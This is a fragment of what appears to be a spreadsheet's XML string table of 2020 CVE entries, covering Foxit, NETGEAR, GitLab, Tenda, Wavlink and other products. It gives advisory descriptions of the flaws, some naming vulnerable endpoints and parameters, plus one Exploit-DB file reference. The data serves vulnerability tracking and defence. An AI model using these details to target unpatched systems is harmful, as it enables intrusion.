    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Reader 9.7.1.29511. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of AcroForms. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-10142.</t>
  </si>
  <si>
    <t>CVE-2020-10901</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit PhantomPDF 9.7.1.29511. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of U3D objects in PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process. Was ZDI-CAN-10461.</t>
  </si>
  <si>
    <t>CVE-2020-10902</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PhantomPDF 9.7.1.29511. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of U3D objects in PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-10462.</t>
  </si>
  <si>
    <t>CVE-2020-10903</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit PhantomPDF 9.7.1.29511. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of U3D objects embedded in a PDF. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process. Was ZDI-CAN-10463.</t>
  </si>
  <si>
    <t>CVE-2020-10904</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PhantomPDF 9.7.1.29511. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of U3D objects in PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-10464.</t>
  </si>
  <si>
    <t>CVE-2020-10905</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit PhantomPDF 9.7.1.29511. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of vertices in U3D objects. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process. Was ZDI-CAN-10568.</t>
  </si>
  <si>
    <t>CVE-2020-10906</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Reader 9.7.1.29511. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the resetForm method. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-10614.</t>
  </si>
  <si>
    <t>CVE-2020-10907</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Reader 9.7.1.29511. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of widgets in XFA forms. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-10650.</t>
  </si>
  <si>
    <t>CVE-2020-10908</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PhantomPDF 9.7.0.29478. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of the Export command of the communication API. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-9865.</t>
  </si>
  <si>
    <t>CVE-2020-10909</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PhantomPDF 9.7.0.29478. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of the AddWatermark command of the communication API. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-9942.</t>
  </si>
  <si>
    <t>CVE-2020-1091</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory, aka 'Windows Graphics Component Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-1097.</t>
  </si>
  <si>
    <t>CVE-2020-10910</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PhantomPDF 9.7.0.29478. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of the RotatePage command of the communication API. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-9943.</t>
  </si>
  <si>
    <t>CVE-2020-10911</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PhantomPDF 9.7.0.29478. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of the GetFieldValue command of the communication API. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-9944.</t>
  </si>
  <si>
    <t>CVE-2020-10912</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PhantomPDF 9.7.0.29478. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of the SetFieldValue command of the communication API. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-9945.</t>
  </si>
  <si>
    <t>CVE-2020-10913</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PhantomPDF 9.7.0.29478. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of the OCRAndExportToExcel command of the communication API. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-9946.</t>
  </si>
  <si>
    <t>CVE-2020-10914</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of VEEAM One Agent 9.5.4.4587. Authentication is not required to exploit this vulnerability. The specific flaw exists within the PerformHandshake method. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-10400.</t>
  </si>
  <si>
    <t>CVE-2020-10915</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of VEEAM One Agent 9.5.4.4587. Authentication is not required to exploit this vulnerability. The specific flaw exists within the HandshakeResult method. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-10401.</t>
  </si>
  <si>
    <t>CVE-2020-10916</t>
  </si>
  <si>
    <t>This vulnerability allows network-adjacent attackers to escalate privileges on affected installations of TP-Link TL-WA855RE Firmware Ver: 855rev4-up-ver1-0-1-P1[20191213-rel60361] Wi-Fi extenders. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the first-time setup process. The issue results from the lack of proper validation on first-time setup requests. An attacker can leverage this vulnerability to reset the password for the Admin account and execute code in the context of the device. Was ZDI-CAN-10003.</t>
  </si>
  <si>
    <t>CVE-2020-10917</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of NEC ESMPRO Manager 6.42. Authentication is not required to exploit this vulnerability. The specific flaw exists within the RMI service. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-10007.</t>
  </si>
  <si>
    <t>CVE-2020-10918</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to bypass authentication on affected installations of C-MORE HMI EA9 Firmware version 6.52 touch screen panels. Authentication is not required to exploit this vulnerability. The specific flaw exists within the authentication mechanism. The issue is due to insufficient authentication on post-authentication requests. An attacker can leverage this vulnerability to escalate privileges to resources normally protected from unauthenticated users. Was ZDI-CAN-10182.</t>
  </si>
  <si>
    <t>CVE-2020-10919</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of C-MORE HMI EA9 Firmware version 6.52 touch screen panels. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of passwords. When transmitting passwords, the process encrypts them in a recoverable format. An attacker can leverage this vulnerability to disclose credentials, leading to further compromise. Was ZDI-CAN-10185.</t>
  </si>
  <si>
    <t>CVE-2020-1092</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory, aka 'Internet Explorer Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-1062.</t>
  </si>
  <si>
    <t>CVE-2020-10920</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of C-MORE HMI EA9 Firmware version 6.52 touch screen panels. Authentication is not required to exploit this vulnerability. The specific flaw exists within the control service, which listens on TCP port 9999 by default. The issue results from the lack of authentication prior to allowing alterations to the system configuration. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-10493.</t>
  </si>
  <si>
    <t>CVE-2020-10921</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to issue commands on affected installations of C-MORE HMI EA9 Firmware version 6.52 touch screen panels. Authentication is not required to exploit this vulnerability. The specific flaw exists within the EA-HTTP.exe process. The issue results from the lack of authentication prior to allowing alterations to the system configuration. An attacker can leverage this vulnerability to issue commands to the physical equipment controlled by the device. Was ZDI-CAN-10482.</t>
  </si>
  <si>
    <t>CVE-2020-10922</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of C-MORE HMI EA9 Firmware version 6.52 touch screen panels. Authentication is not required to exploit this vulnerability. The specific flaw exists within the EA-HTTP.exe process. The issue results from the lack of proper input validation prior to further processing user requests. An attacker can leverage this vulnerability to create a denial-of-service condition on the system. Was ZDI-CAN-10527.</t>
  </si>
  <si>
    <t>CVE-2020-10923</t>
  </si>
  <si>
    <t>This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6700 V1.0.4.84_10.0.58 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the UPnP service, which listens on TCP port 5000. A crafted UPnP message can be used to bypass authentication. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of root. Was ZDI-CAN-9642.</t>
  </si>
  <si>
    <t>CVE-2020-10924</t>
  </si>
  <si>
    <t>This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6700 V1.0.4.84_10.0.58 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the UPnP service, which listens on TCP port 5000 by default. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length, stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9643.</t>
  </si>
  <si>
    <t>CVE-2020-10925</t>
  </si>
  <si>
    <t>This vulnerability allows network-adjacent attackers to compromise the integrity of downloaded information on affected installations of NETGEAR R6700 V1.0.4.84_10.0.58 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the downloading of files via HTTPS. The issue results from the lack of proper validation of the certificate presented by the server. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of root. Was ZDI-CAN-9647.</t>
  </si>
  <si>
    <t>CVE-2020-10926</t>
  </si>
  <si>
    <t>This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of NETGEAR R6700 V1.0.4.84_10.0.58 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of firmware updates. The issue results from the lack of proper validation of the firmware image prior to performing an upgrade. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of root. Was ZDI-CAN-9648.</t>
  </si>
  <si>
    <t>CVE-2020-10927</t>
  </si>
  <si>
    <t>This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of NETGEAR R6700 V1.0.4.84_10.0.58 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the encryption of firmware update images. The issue results from the use of an inappropriate encryption algorithm. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of root. Was ZDI-CAN-9649.</t>
  </si>
  <si>
    <t>CVE-2020-10928</t>
  </si>
  <si>
    <t>This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of NETGEAR R6700 V1.0.4.84_10.0.58 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of string table file uploads. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length, heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the web server. Was ZDI-CAN-9767.</t>
  </si>
  <si>
    <t>CVE-2020-10929</t>
  </si>
  <si>
    <t>This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of NETGEAR R6700 V1.0.4.84_10.0.58 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of string table file uploads. The issue results from the lack of proper validation of user-supplied data, which can result in an integer overflow before allocating a buffer. An attacker can leverage this vulnerability to execute code in the context of the admin user. Was ZDI-CAN-9768.</t>
  </si>
  <si>
    <t>CVE-2020-1093</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory, aka 'VBScript Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1035, CVE-2020-1058, CVE-2020-1060.</t>
  </si>
  <si>
    <t>CVE-2020-10930</t>
  </si>
  <si>
    <t>This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of NETGEAR R6700 V1.0.4.84_10.0.58 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of URLs. The issue results from the lack of proper routing of URLs. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-9618.</t>
  </si>
  <si>
    <t>CVE-2020-10931</t>
  </si>
  <si>
    <t>Memcached 1.6.x before 1.6.2 allows remote attackers to cause a denial of service (daemon crash) via a crafted binary protocol header to try_read_command_binary in memcached.c.</t>
  </si>
  <si>
    <t>CVE-2020-10932</t>
  </si>
  <si>
    <t>An issue was discovered in Arm Mbed TLS before 2.16.6 and 2.7.x before 2.7.15. An attacker that can get precise enough side-channel measurements can recover the long-term ECDSA private key by (1) reconstructing the projective coordinate of the result of scalar multiplication by exploiting side channels in the conversion to affine coordinates; (2) using an attack described by Naccache, Smart, and Stern in 2003 to recover a few bits of the ephemeral scalar from those projective coordinates via several measurements; and (3) using a lattice attack to get from there to the long-term ECDSA private key used for the signatures. Typically an attacker would have sufficient access when attacking an SGX enclave and controlling the untrusted OS.</t>
  </si>
  <si>
    <t>CVE-2020-10933</t>
  </si>
  <si>
    <t>An issue was discovered in Ruby 2.5.x through 2.5.7, 2.6.x through 2.6.5, and 2.7.0. If a victim calls BasicSocket#read_nonblock(requested_size, buffer, exception: false), the method resizes the buffer to fit the requested size, but no data is copied. Thus, the buffer string provides the previous value of the heap. This may expose possibly sensitive data from the interpreter.</t>
  </si>
  <si>
    <t>CVE-2020-10934</t>
  </si>
  <si>
    <t>Acyba AcyMailing before 6.9.2 mishandles file uploads by admins.</t>
  </si>
  <si>
    <t>CVE-2020-10935</t>
  </si>
  <si>
    <t>Zulip Server before 2.1.3 allows XSS via a Markdown link, with resultant account takeover.</t>
  </si>
  <si>
    <t>CVE-2020-10936</t>
  </si>
  <si>
    <t>Sympa before 6.2.56 allows privilege escalation.</t>
  </si>
  <si>
    <t>CVE-2020-10937</t>
  </si>
  <si>
    <t>An issue was discovered in IPFS (aka go-ipfs) 0.4.23. An attacker can generate ephemeral identities (Sybils) and leverage the IPFS connection management reputation system to poison other nodes' routing tables, eclipsing the nodes that are the target of the attack from the rest of the network. Later versions, in particular go-ipfs 0.7, mitigate this.</t>
  </si>
  <si>
    <t>CVE-2020-10938</t>
  </si>
  <si>
    <t>GraphicsMagick before 1.3.35 has an integer overflow and resultant heap-based buffer overflow in HuffmanDecodeImage in magick/compress.c.</t>
  </si>
  <si>
    <t>CVE-2020-10939</t>
  </si>
  <si>
    <t>Insecure, default path permissions in PHOENIX CONTACT PC WORX SRT through 1.14 allow for local privilege escalation.</t>
  </si>
  <si>
    <t>CVE-2020-1094</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations, aka 'Windows Work Folder Service Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-10940</t>
  </si>
  <si>
    <t>Local Privilege Escalation can occur in PHOENIX CONTACT PORTICO SERVER through 3.0.7 when installed to run as a service.</t>
  </si>
  <si>
    <t>CVE-2020-10941</t>
  </si>
  <si>
    <t>Arm Mbed TLS before 2.16.5 allows attackers to obtain sensitive information (an RSA private key) by measuring cache usage during an import.</t>
  </si>
  <si>
    <t>CVE-2020-10942</t>
  </si>
  <si>
    <t>In the Linux kernel before 5.5.8, get_raw_socket in drivers/vhost/net.c lacks validation of an sk_family field, which might allow attackers to trigger kernel stack corruption via crafted system calls.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H</t>
  </si>
  <si>
    <t>CVE-2020-10944</t>
  </si>
  <si>
    <t>HashiCorp Nomad and Nomad Enterprise up to 0.10.4 contained a cross-site scripting vulnerability such that files from a malicious workload could cause arbitrary JavaScript to execute in the web UI. Fixed in 0.10.5.</t>
  </si>
  <si>
    <t>CVE-2020-10945</t>
  </si>
  <si>
    <t>Centreon before 19.10.7 exposes Session IDs in server responses.</t>
  </si>
  <si>
    <t>CVE-2020-10946</t>
  </si>
  <si>
    <t>Cross-site scripting (XSS) vulnerability allows remote attackers to inject arbitrary web script or HTML via the page parameter to service-monitoring/src/index.php. This vulnerability is fixed in versions 1.6.4, 18.10.3, 19.04.3, and 19.0.1 of the Centreon host-monitoring widget; 1.6.4, 18.10.5, 19.04.3, 19.10.2 of the Centreon service-monitoring widget; and 1.0.3, 18.10.1, 19.04.1, 19.10.1 of the Centreon tactical-overview widget.</t>
  </si>
  <si>
    <t>CVE-2020-10947</t>
  </si>
  <si>
    <t>Mac Endpoint for Sophos Central before 9.9.6 and Mac Endpoint for Sophos Home before 2.2.6 allow Privilege Escalation.</t>
  </si>
  <si>
    <t>CVE-2020-10948</t>
  </si>
  <si>
    <t>Jon Hedley AlienForm2 (typically installed as af.cgi or alienform.cgi) 2.0.2 is vulnerable to Remote Command Execution via eval injection, a different issue than CVE-2002-0934. An unauthenticated, remote attacker can exploit this via a series of crafted requests.</t>
  </si>
  <si>
    <t>CVE-2020-10951</t>
  </si>
  <si>
    <t>Western Digital My Cloud Home and ibi devices before 2.2.0 allow clickjacking on sign-in pages.</t>
  </si>
  <si>
    <t>CVE-2020-10952</t>
  </si>
  <si>
    <t>GitLab EE/CE 8.11 through 12.9.1 allows blocked users to pull/push docker images.</t>
  </si>
  <si>
    <t>CVE-2020-10953</t>
  </si>
  <si>
    <t>In GitLab EE 11.7 through 12.9, the NPM feature is vulnerable to a path traversal issue.</t>
  </si>
  <si>
    <t>CVE-2020-10954</t>
  </si>
  <si>
    <t>GitLab through 12.9 is affected by a potential DoS in repository archive download.</t>
  </si>
  <si>
    <t>CVE-2020-10955</t>
  </si>
  <si>
    <t>GitLab EE/CE 11.1 through 12.9 is vulnerable to parameter tampering on an upload feature that allows an unauthorized user to read content available under specific folders.</t>
  </si>
  <si>
    <t>CVE-2020-10956</t>
  </si>
  <si>
    <t>GitLab 8.10 and later through 12.9 is vulnerable to an SSRF in a project import note feature.</t>
  </si>
  <si>
    <t>CVE-2020-10957</t>
  </si>
  <si>
    <t>In Dovecot before 2.3.10.1, unauthenticated sending of malformed parameters to a NOOP command causes a NULL Pointer Dereference and crash in submission-login, submission, or lmtp.</t>
  </si>
  <si>
    <t>CVE-2020-10958</t>
  </si>
  <si>
    <t>In Dovecot before 2.3.10.1, a crafted SMTP/LMTP message triggers an unauthenticated use-after-free bug in submission-login, submission, or lmtp, and can lead to a crash under circumstances involving many newlines after a command.</t>
  </si>
  <si>
    <t>CVE-2020-10959</t>
  </si>
  <si>
    <t>resources/src/mediawiki.page.ready/ready.js in MediaWiki before 1.35 allows remote attackers to force a logout and external redirection via HTML content in a MediaWiki page.</t>
  </si>
  <si>
    <t>CVE-2020-1096</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists when Microsoft Edge PDF Reader improperly handles objects in memory, aka 'Microsoft Edge PDF Remote Code Execution Vulnerability'.</t>
  </si>
  <si>
    <t>exploits/php/webapps/49112.py</t>
  </si>
  <si>
    <t>Laravel Administrator 4 - Unrestricted File Upload (Authenticated)</t>
  </si>
  <si>
    <t>CVE-2020-10960</t>
  </si>
  <si>
    <t>In MediaWiki before 1.34.1, users can add various Cascading Style Sheets (CSS) classes (which can affect what content is shown or hidden in the user interface) to arbitrary DOM nodes via HTML content within a MediaWiki page. This occurs because jquery.makeCollapsible allows applying an event handler to any Cascading Style Sheets (CSS) selector. There is no known way to exploit this for cross-site scripting (XSS).</t>
  </si>
  <si>
    <t>CVE-2020-10963</t>
  </si>
  <si>
    <t>FrozenNode Laravel-Administrator through 5.0.12 allows unrestricted file upload (and consequently Remote Code Execution) via admin/tips_image/image/file_upload image upload with PHP content within a GIF image that has the .php extension. NOTE: this product is discontinued.</t>
  </si>
  <si>
    <t>CVE-2020-10964</t>
  </si>
  <si>
    <t>Serendipity before 2.3.4 on Windows allows remote attackers to execute arbitrary code because the filename of a renamed file may end with a dot. This file may then be renamed to have a .php filename.</t>
  </si>
  <si>
    <t>CVE-2020-10965</t>
  </si>
  <si>
    <t>Teradici PCoIP Management Console 20.01.0 and 19.11.1 is vulnerable to unauthenticated password resets via login/resetadminpassword of the default admin account. This vulnerability only exists when the default admin account is not disabled. It is fixed in 20.01.1 and 19.11.2.</t>
  </si>
  <si>
    <t>CVE-2020-10966</t>
  </si>
  <si>
    <t>In the Password Reset Module in VESTA Control Panel through 0.9.8-25 and Hestia Control Panel before 1.1.1, Host header manipulation leads to account takeover because the victim receives a reset URL containing an attacker-controlled server name.</t>
  </si>
  <si>
    <t>CVE-2020-10967</t>
  </si>
  <si>
    <t>In Dovecot before 2.3.10.1, remote unauthenticated attackers can crash the lmtp or submission process by sending mail with an empty localpart.</t>
  </si>
  <si>
    <t>CVE-2020-10968</t>
  </si>
  <si>
    <t>FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.aoju.bus.proxy.provider.remoting.RmiProvider (aka bus-proxy).</t>
  </si>
  <si>
    <t>CVE-2020-10969</t>
  </si>
  <si>
    <t>FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to javax.swing.JEditorPane.</t>
  </si>
  <si>
    <t>CVE-2020-1097</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory, aka 'Windows Graphics Component Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-1091.</t>
  </si>
  <si>
    <t>CVE-2020-10971</t>
  </si>
  <si>
    <t>An issue was discovered on Wavlink Jetstream devices where a crafted POST request can be sent to adm.cgi that will result in the execution of the supplied command if there is an active session at the same time. The POST request itself is not validated to ensure it came from the active session. Affected devices are: Wavlink WN530HG4, Wavlink WN575A3, Wavlink WN579G3,Wavlink WN531G3, Wavlink WN533A8, Wavlink WN531A6, Wavlink WN551K1, Wavlink WN535G3, Wavlink WN530H4, Wavlink WN57X93, WN572HG3, Wavlink WN578A2, Wavlink WN579G3, Wavlink WN579X3, and Jetstream AC3000/ERAC3000</t>
  </si>
  <si>
    <t>CVE-2020-10972</t>
  </si>
  <si>
    <t>An issue was discovered where a page is exposed that has the current administrator password in cleartext in the source code of the page. No authentication is required in order to reach the page (a certain live_?.shtml page with the variable syspasswd). Affected Devices: Wavlink WN530HG4, Wavlink WN531G3, and Wavlink WN572HG3</t>
  </si>
  <si>
    <t>CVE-2020-10973</t>
  </si>
  <si>
    <t>An issue was discovered in Wavlink WN530HG4, Wavlink WN531G3, Wavlink WN533A8, and Wavlink WN551K1 affecting /cgi-bin/ExportAllSettings.sh where a crafted POST request returns the current configuration of the device, including the administrator password. No authentication is required. The attacker must perform a decryption step, but all decryption information is readily available.</t>
  </si>
  <si>
    <t>CVE-2020-10974</t>
  </si>
  <si>
    <t>An issue was discovered affecting a backup feature where a crafted POST request returns the current configuration of the device in cleartext, including the administrator password. No authentication is required. Affected devices: Wavlink WN575A3, Wavlink WN579G3, Wavlink WN531A6, Wavlink WN535G3, Wavlink WN530H4, Wavlink WN57X93, Wavlink WN572HG3, Wavlink WN575A4, Wavlink WN578A2, Wavlink WN579G3, Wavlink WN579X3, and Jetstream AC3000/ERAC3000</t>
  </si>
  <si>
    <t>CVE-2020-10975</t>
  </si>
  <si>
    <t>GitLab EE/CE 10.8 to 12.9 is leaking metadata and comments on vulnerabilities to unauthorized users on the vulnerability feedback page.</t>
  </si>
  <si>
    <t>CVE-2020-10976</t>
  </si>
  <si>
    <t>GitLab EE/CE 8.17 to 12.9 is vulnerable to information leakage when querying a merge request widget.</t>
  </si>
  <si>
    <t>CVE-2020-10977</t>
  </si>
  <si>
    <t>GitLab EE/CE 8.5 to 12.9 is vulnerable to a an path traversal when moving an issue between projects.</t>
  </si>
  <si>
    <t>CVE-2020-10978</t>
  </si>
  <si>
    <t>GitLab EE/CE 8.11 to 12.9 is leaking information on Issues opened in a public project and then moved to a private project through Web-UI and GraphQL API.</t>
  </si>
  <si>
    <t>CVE-2020-10979</t>
  </si>
  <si>
    <t>GitLab EE/CE 11.10 to 12.9 is leaking information on restricted CI pipelines metrics to unauthorized users.</t>
  </si>
  <si>
    <t>CVE-2020-1098</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Shell infrastructure component improperly handles objects in memory, aka 'Windows Shell Infrastructure Component Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-10980</t>
  </si>
  <si>
    <t>GitLab EE/CE 8.0.rc1 to 12.9 is vulnerable to a blind SSRF in the FogBugz integration.</t>
  </si>
  <si>
    <t>CVE-2020-10981</t>
  </si>
  <si>
    <t>GitLab EE/CE 9.0 to 12.9 allows a maintainer to modify other maintainers' pipeline trigger descriptions within the same project.</t>
  </si>
  <si>
    <t>CVE-2020-10982</t>
  </si>
  <si>
    <t>Gambio GX before 4.0.1.0 allows SQL Injection in admin/gv_mail.php.</t>
  </si>
  <si>
    <t>CVE-2020-10983</t>
  </si>
  <si>
    <t>Gambio GX before 4.0.1.0 allows SQL Injection in admin/mobile.php.</t>
  </si>
  <si>
    <t>CVE-2020-10984</t>
  </si>
  <si>
    <t>Gambio GX before 4.0.1.0 allows admin/admin.php CSRF.</t>
  </si>
  <si>
    <t>CVE-2020-10985</t>
  </si>
  <si>
    <t>Gambio GX before 4.0.1.0 allows XSS in admin/coupon_admin.php.</t>
  </si>
  <si>
    <t>CVE-2020-10986</t>
  </si>
  <si>
    <t>A CSRF issue in the /goform/SysToolReboot endpoint of Tenda AC15 AC1900 version 15.03.05.19 allows remote attackers to reboot the device and cause denial of service via a payload hosted by an attacker-controlled web page.</t>
  </si>
  <si>
    <t>CVE-2020-10987</t>
  </si>
  <si>
    <t>The goform/setUsbUnload endpoint of Tenda AC15 AC1900 version 15.03.05.19 allows remote attackers to execute arbitrary system commands via the deviceName POST parameter.</t>
  </si>
  <si>
    <t>CVE-2020-10988</t>
  </si>
  <si>
    <t>A hard-coded telnet credential in the tenda_login binary of Tenda AC15 AC1900 version 15.03.05.19 allows unauthenticated remote attackers to start a telnetd service on the device.</t>
  </si>
  <si>
    <t>CVE-2020-10989</t>
  </si>
  <si>
    <t>An XSS issue in the /goform/WifiBasicSet endpoint of Tenda AC15 AC1900 version 15.03.05.19 allows remote attackers to execute malicious payloads via the WifiName POST parameter.</t>
  </si>
  <si>
    <t>CVE-2020-1099</t>
  </si>
  <si>
    <t>A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft Office SharePoint XSS Vulnerability'. This CVE ID is unique from CVE-2020-1100, CVE-2020-1101, CVE-2020-1106.</t>
  </si>
  <si>
    <t>CVE-2020-10990</t>
  </si>
  <si>
    <t>An XXE issue exists in Accenture Mercury before 1.12.28 because of the platformlambda/core/serializers/SimpleXmlParser.java component.</t>
  </si>
  <si>
    <t>CVE-2020-10991</t>
  </si>
  <si>
    <t>Mulesoft APIkit through 1.3.0 allows XXE because of validation/RestXmlSchemaValidator.java</t>
  </si>
  <si>
    <t>CVE-2020-10992</t>
  </si>
  <si>
    <t>Azkaban through 3.84.0 allows XXE, related to validator/XmlValidatorManager.java and user/XmlUserManager.java.</t>
  </si>
  <si>
    <t>CVE-2020-10993</t>
  </si>
  <si>
    <t>Osmand through 2.0.0 allow XXE because of binary/BinaryMapIndexReader.java.</t>
  </si>
  <si>
    <t>CVE-2020-10994</t>
  </si>
  <si>
    <t>In libImaging/Jpeg2KDecode.c in Pillow before 7.1.0, there are multiple out-of-bounds reads via a crafted JP2 file.</t>
  </si>
  <si>
